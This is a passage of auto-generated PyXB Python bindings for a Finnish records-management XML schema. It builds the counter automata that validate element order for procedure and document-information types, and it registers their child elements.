        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_4, True) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_4, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_4, False) ]))
    st_6._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_5, True) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_5, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_5, False) ]))
    st_7._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_6, True) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_6, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_6, False) ]))
    st_8._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_7, True) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_7, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_7, False) ]))
    st_9._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_8, True) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_8, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_8, False) ]))
    st_10._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_9, True) ]))
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_9, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_9, False) ]))
    st_11._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_12, [
        fac.UpdateInstruction(cc_10, True) ]))
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_10, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_10, False) ]))
    st_12._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_13, [
        fac.UpdateInstruction(cc_11, True) ]))
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_11, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_11, False) ]))
    st_13._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_14, [
        fac.UpdateInstruction(cc_12, True) ]))
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_12, False) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_12, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_12, False) ]))
    st_14._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_15, [
        fac.UpdateInstruction(cc_13, True) ]))
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_13, False) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_13, False) ]))
    st_15._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_16, [
        fac.UpdateInstruction(cc_14, True) ]))
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_14, False) ]))
    st_16._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_17, [
        fac.UpdateInstruction(cc_15, True) ]))
    st_17._set_transitionSet(transitions)
    # nullable=False: the content model requires at least one element.
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the compiled automaton to the binding class (the helper deletes
# itself from the module namespace when invoked).
kasittelyprosessiTiedotTyyppi._Automaton = _BuildAutomaton_10()
# Auto-generated (PyXB): register the child-element declarations on the
# toimenpidetiedotTyyppi complex-type binding.  Note the recursive element:
# 'Toimenpidetiedot' may nest instances of the same type, and 'Asiakirjatieto'
# links to the document-information type.
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), kuvausTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), toimenpideluokkaTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), toimenpideluokkaTarkenneTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), kasittelyprosessinTilaTekstiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=toimenpidetiedotTyyppi, location=None))
# 'Laajennos' is the generic, organisation-specific extension point (schema
# documentation retained verbatim in Finnish).
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=toimenpidetiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, scope=toimenpidetiedotTyyppi, location=None))
toimenpidetiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiakirjatieto'), asiakirjatietoTyyppi, scope=toimenpidetiedotTyyppi, location=None))
def _BuildAutomaton_11 ():
    """Build the content-model FAC automaton for toimenpidetiedotTyyppi.

    Seventeen element slots in schema order.  Slots 0-13 are optional
    singletons, each governed by its own 0..1 counter; slots 14
    (Asiakirjatieto) and 15 (Toimenpidetiedot) interleave freely under a
    shared 0..1 counter; slot 16 (Laajennos) repeats without bound.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_11
    del _BuildAutomaton_11
    import pyxb.utils.fac as fac

    # ccs[0..14]: occurrence 0..1; ccs[15]: occurrence 0..unbounded.
    ccs = [fac.CounterCondition(min=0, max=1, metadata=None) for _ in range(15)]
    ccs.append(fac.CounterCondition(min=0, max=None, metadata=None))
    counters = set(ccs)

    # Element tags, in the state order of the generated automaton.
    tags = ('ToimenpideluokkaTeksti', 'ToimenpideluokkaTarkenneTeksti',
            'ToimenpiteenKuvausTeksti', 'KasittelyprosessinTilaTeksti',
            'TietojarjestelmaNimi', 'OrganisaatioNimi', 'LaatijaNimi',
            'LaadittuPvm', 'MuokkaajaNimi', 'MuokattuPvm', 'HyvaksyjaNimi',
            'HyvaksyttyPvm', 'VoimassaoloAlkaaPvm', 'VoimassaoloPaattyyPvm',
            'Asiakirjatieto', 'Toimenpidetiedot', 'Laajennos')
    # Counter index per state: states 14 and 15 share ccs[14].
    ctr_for_state = list(range(14)) + [14, 14, 15]

    states = []
    for tag, ci in zip(tags, ctr_for_state):
        symbol = pyxb.binding.content.ElementUse(
            toimenpidetiedotTyyppi._UseForTag(
                pyxb.namespace.ExpandedName(Namespace, tag)), None)
        states.append(fac.State(
            symbol, is_initial=True,
            final_update=set([fac.UpdateInstruction(ccs[ci], False)]),
            is_unordered_catenation=False))

    # States 0-13: a self-loop increments the state's own counter; any
    # later state may follow, closing (resetting) the current counter.
    for i in range(14):
        transitions = [fac.Transition(states[i], [
            fac.UpdateInstruction(ccs[i], True)])]
        transitions.extend(fac.Transition(states[j], [
            fac.UpdateInstruction(ccs[i], False)]) for j in range(i + 1, 17))
        states[i]._set_transitionSet(transitions)

    # States 14 and 15 interleave under the shared counter ccs[14].
    st_14, st_15, st_16 = states[14], states[15], states[16]
    st_14._set_transitionSet([
        fac.Transition(st_14, []),
        fac.Transition(st_14, [fac.UpdateInstruction(ccs[14], True)]),
        fac.Transition(st_15, [fac.UpdateInstruction(ccs[14], True)]),
        fac.Transition(st_16, [fac.UpdateInstruction(ccs[14], False)])])
    st_15._set_transitionSet([
        fac.Transition(st_14, [fac.UpdateInstruction(ccs[14], True)]),
        fac.Transition(st_15, []),
        fac.Transition(st_15, [fac.UpdateInstruction(ccs[14], True)]),
        fac.Transition(st_16, [fac.UpdateInstruction(ccs[14], False)])])
    # State 16 (Laajennos) may repeat indefinitely.
    st_16._set_transitionSet([
        fac.Transition(st_16, [fac.UpdateInstruction(ccs[15], True)])])
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the validated content model to the complex type; the helper
# deletes itself from the module namespace when invoked.
toimenpidetiedotTyyppi._Automaton = _BuildAutomaton_11()
# Table-driven registration of asiakirjatietoTyyppi's child elements:
# (tag, binding type, optional schema documentation), in schema order.
for _tag, _type, _doc in (
        ('AsiakirjaluokkaTeksti', asiakirjaLuokkaTekstiTyyppi, None),
        ('OrganisaatioNimi', pyxb.binding.datatypes.string, None),
        ('TietojarjestelmaNimi', pyxb.binding.datatypes.string, None),
        ('LaatijaNimi', _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, None),
        ('LaadittuPvm', _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, None),
        ('MuokkaajaNimi', _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, None),
        ('MuokattuPvm', _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, None),
        ('HyvaksyjaNimi', _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, None),
        ('HyvaksyttyPvm', _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, None),
        ('VoimassaoloAlkaaPvm', _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, None),
        ('VoimassaoloPaattyyPvm', _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, None),
        ('PaatietoryhmatTeksti', pyxb.binding.datatypes.string, None),
        ('AsiakirjaluokkaTarkenneTeksti', pyxb.binding.datatypes.string, None),
        ('Laajennos', CTD_ANON_, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.'),
        ('Asiasanat', asiasanatTyyppi, None),
        ('Kasittelysaannot', kasittelysaannotTyyppi, None),
        ('Kayttorajoitustiedot', kayttorajoitusTiedotTyyppi, None),
        ('Sailytysaikatiedot', sailytysaikaTiedotTyyppi, None),
        ):
    # Only pass documentation= when the generator had one, so elements
    # without schema documentation are constructed exactly as before.
    _kw = dict(scope=asiakirjatietoTyyppi, location=None)
    if _doc is not None:
        _kw['documentation'] = _doc
    asiakirjatietoTyyppi._AddElement(pyxb.binding.basis.element(
        pyxb.namespace.ExpandedName(Namespace, _tag), _type, **_kw))
def _BuildAutomaton_12 ():
    """Build the finite automaton with counters (FAC) that validates the
    content model of ``asiakirjatietoTyyppi``.

    PyXB-generated code — do not edit by hand.  The automaton encodes the
    schema's element ordering: each state accepts one child element, and
    the counter conditions enforce the occurrence constraints.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_12
    del _BuildAutomaton_12
    import pyxb.utils.fac as fac
    # Occurrence counters: cc_0..cc_11 and cc_13 allow 0..1 occurrences;
    # cc_12 and cc_14 are unbounded (0..*).
    counters = set()
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_3)
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_4)
    cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_5)
    cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_6)
    cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_7)
    cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_8)
    cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_9)
    cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_10)
    cc_11 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_11)
    cc_12 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_12)
    cc_13 = fac.CounterCondition(min=0, max=1, metadata=None)
    counters.add(cc_13)
    cc_14 = fac.CounterCondition(min=0, max=None, metadata=None)
    counters.add(cc_14)
    # States: one per child element; st_0 is the initial state and states
    # with a non-None final_update may terminate the content model.
    states = []
    final_update = None
    # st_0: Kayttorajoitustiedot (initial)
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot')), None)
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    final_update = None
    # st_1: Sailytysaikatiedot
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot')), None)
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = None
    # st_2: OrganisaatioNimi
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = None
    # st_3: LaatijaNimi
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = None
    # st_4: LaadittuPvm
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = None
    # st_5: MuokkaajaNimi
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    final_update = None
    # st_6: MuokattuPvm
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
    st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    final_update = None
    # st_7: HyvaksyjaNimi
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
    st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_7)
    final_update = None
    # st_8: HyvaksyttyPvm
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
    st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_8)
    final_update = None
    # st_9: VoimassaoloAlkaaPvm
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
    st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_9)
    final_update = None
    # st_10: VoimassaoloPaattyyPvm
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
    st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_10)
    # st_11: AsiakirjaluokkaTeksti (first state that can end the content model)
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti')), None)
    st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_11)
    # st_12: AsiakirjaluokkaTarkenneTeksti
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_9, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti')), None)
    st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_12)
    # st_13: TietojarjestelmaNimi
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_10, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi')), None)
    st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_13)
    # st_14: Kasittelysaannot
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_11, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot')), None)
    st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_14)
    # st_15: Asiasanat (repeatable, governed by cc_12)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_12, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat')), None)
    st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_15)
    # st_16: PaatietoryhmatTeksti
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_13, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti')), None)
    st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_16)
    # st_17: Laajennos (repeatable, governed by cc_14)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_14, False))
    symbol = pyxb.binding.content.ElementUse(asiakirjatietoTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
    st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_17)
    # Transition table: from each state, a self-loop increments its counter
    # (UpdateInstruction(cc, True)) and forward transitions reset/close it
    # (UpdateInstruction(cc, False)).  Empty update lists are unconditional.
    transitions = []
    transitions.append(fac.Transition(st_1, [
        ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    transitions.append(fac.Transition(st_6, [
        ]))
    transitions.append(fac.Transition(st_7, [
        ]))
    transitions.append(fac.Transition(st_8, [
        ]))
    transitions.append(fac.Transition(st_9, [
        ]))
    transitions.append(fac.Transition(st_10, [
        ]))
    transitions.append(fac.Transition(st_11, [
        ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_6, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_7, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_8, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_9, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_10, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_11, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, True) ]))
